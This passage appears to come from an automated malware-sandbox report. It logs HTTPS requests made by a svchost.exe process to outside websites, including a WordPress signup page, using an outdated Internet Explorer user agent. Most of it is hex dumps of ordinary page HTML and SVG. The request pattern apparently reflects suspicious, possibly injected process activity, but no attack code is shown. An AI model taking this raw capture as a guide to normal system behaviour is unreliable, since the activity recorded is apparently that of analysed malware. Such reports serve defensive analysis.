                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    Vary: Accept-Language
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NdKx0XvfNGZe818fco%2B59JvGGrJ90E8gYPdn46SAxEbUqxqW0tyrku0KOFJ70QWRbyAssCoHs7B6Re8X0llZWouDonkNhPnM5GShxnVHTgT6owmGbj6T6K0JW%2BgwbOpU"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    CF-RAY: 7ed761bf0f15367d-FRA
                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC952INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC952INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    7192.168.2.45618983.223.113.46443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:45:16 UTC951OUTGET /wp-signup.php?new=magicomm.co.uk HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: dataform.co.uk
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1657INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Cache-Control: must-revalidate, no-cache, max-age=0
                                                                                                                                                                                                                                                                    Keep-Alive: timeout=2, max=100
                                                                                                                                                                                                                                                                    Content-Length: 49180
                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: mobileappversionnumber, x-requested-with
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                    X-Powered-By: PHP/7.0.29
                                                                                                                                                                                                                                                                    X-UA-Compatible: IE=EmulateIE10
                                                                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                    X-Mod-Pagespeed: 1.9.32.14-0
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=10886400
                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:45:18 GMT
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1657INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 36 29 20 7c 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 09 20 20 20 20 3c
                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if !(IE 6) | !(IE 7) | !(IE 8) ]>...><html lang="en-US" class="no-js">...<![endif]--><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0"> <
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1661INData Raw: 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e
                                                                                                                                                                                                                                                                    Data Ascii: readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).con
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1669INData Raw: 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70
                                                                                                                                                                                                                                                                    Data Ascii: 6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' rep
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1677INData Raw: 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f
                                                                                                                                                                                                                                                                    Data Ascii: ript' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1685INData Raw: 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75
                                                                                                                                                                                                                                                                    Data Ascii: tps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.u
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1709INData Raw: 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69
                                                                                                                                                                                                                                                                    Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-i
                                                                                                                                                                                                                                                                    2023-07-27 19:45:19 UTC1717INData Raw: 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 64 74 2d 74 68 65 37 2f 6a 73 2f 6d 61 69 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 30 2e 31 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 70 63 66 37 3d 7b 22 61 70 69 53 65 74 74 69 6e 67 73 22 3a 7b 22 72 6f 6f 74 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 2c 22 6e 61 6d 65 73 70 61 63 65 22 3a 22 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b
                                                                                                                                                                                                                                                                    Data Ascii: 'https://dataform.co.uk/wp-content/themes/dt-the7/js/main.min.js?ver=6.6.0.1'></script><script type='text/javascript'>//<![CDATA[var wpcf7={"apiSettings":{"root":"https:\/\/dataform.co.uk\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}};


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                    8192.168.2.45619249.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2023-07-27 19:45:17 UTC952OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                    Accept: *
                                                                                                                                                                                                                                                                    Accept-Language: en-us
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                    Host: nts-web.net
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC953INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                    Date: Thu, 27 Jul 2023 19:45:17 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                    Content-Length: 2599149
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
                                                                                                                                                                                                                                                                    ETag: "27a8ed-5eceaf89b8f40"
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC953INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 77 65 62 73 69 74 65 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 77 65 62 73 69 74 65 23 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
                                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="ja"> <head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# website: http://ogp.me/ns/website#"> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="wi
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC969INData Raw: 77 69 64 74 68 3a 31 2e 30 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 32 2c 2e 63 6c 73 2d 31 36 33 7b 66 69 6c 6c 3a 23 39 32 64 31 64 37 3b 7d 2e 63 6c 73 2d 31 36 31 2c 2e 63 6c 73 2d 31 36 35 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 39 37 70 78 3b 7d 2e 63 6c 73 2d 31 36 32 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 31 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 33 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 32 35 70 78 3b 7d 2e 63 6c 73 2d 31 36 34 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 2e 35 34 70 78 3b 7d 2e 63 6c 73 2d 31 36 35 7b 66 69 6c 6c 3a 23 65 65 65 39 34 32 3b 7d 2e 63 6c 73 2d 31 36 36 7b 66 69 6c 6c 3a 23 65 34 38 32 37 65 3b 7d 2e 63 6c 73 2d 31 36 37 7b 66 69 6c 6c 3a 23 38 36 63 64 64 34 3b 7d 2e 63
                                                                                                                                                                                                                                                                    Data Ascii: width:1.04px;}.cls-161,.cls-162,.cls-163{fill:#92d1d7;}.cls-161,.cls-165{stroke-width:0.97px;}.cls-162{stroke-width:1.15px;}.cls-163{stroke-width:1.25px;}.cls-164{stroke-width:1.54px;}.cls-165{fill:#eee942;}.cls-166{fill:#e4827e;}.cls-167{fill:#86cdd4;}.c
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC985INData Raw: 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 38 33 2c 31 39 35 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 36 39 32 2e 36 2c 31 38 38 2e 31 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34
                                                                                                                                                                                                                                                                    Data Ascii: 1,.15,2.86"/><path class="cls-4" d="M692.83,195a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M692.6,188.1a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1001INData Raw: 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 33 35 2c 32 36 33 2e 34 31 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 37 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 32 33 2e 31 32 2c 32 35 36 2e 34 38 61 31
                                                                                                                                                                                                                                                                    Data Ascii: 2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M723.35,263.41a1.71,1.71,0,0,1-.77,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M723.12,256.48a1
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1017INData Raw: 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e
                                                                                                                                                                                                                                                                    Data Ascii: ,0,0,1,.51-2.89,2.
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1017INData Raw: 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 38 38 2c 33 33 31 2e 37 39 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 35 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 35 33 2e 36 34 2c 33 32 34 2e 38 36 61 31 2e 37 31 2c 31 2e 37 31
                                                                                                                                                                                                                                                                    Data Ascii: 24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M753.88,331.79a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.95,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"/><path class="cls-4" d="M753.64,324.86a1.71,1.71
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1033INData Raw: 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 37 39 2c 32 30 36 2e 32 37 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 37 30 2e 35 35 2c
                                                                                                                                                                                                                                                                    Data Ascii: ,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class="cls-4" d="M770.79,206.27a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"/><path class="cls-4" d="M770.55,
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1049INData Raw: 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 31 2e 33 31 2c 32 37 34 2e 36 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73
                                                                                                                                                                                                                                                                    Data Ascii: 34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"/><path class="cls-4" d="M801.31,274.66a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.41,2.41,0,0,1,.52-2.89,2.24,2.24,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"/><path class
                                                                                                                                                                                                                                                                    2023-07-27 19:45:18 UTC1065INData Raw: 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 31 2e 38 34 2c 33 34 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 2f 3e 3c 70
                                                                                                                                                                                                                                                                    Data Ascii: 1,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"/><path class="cls-4" d="M831.84,343a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"/><p
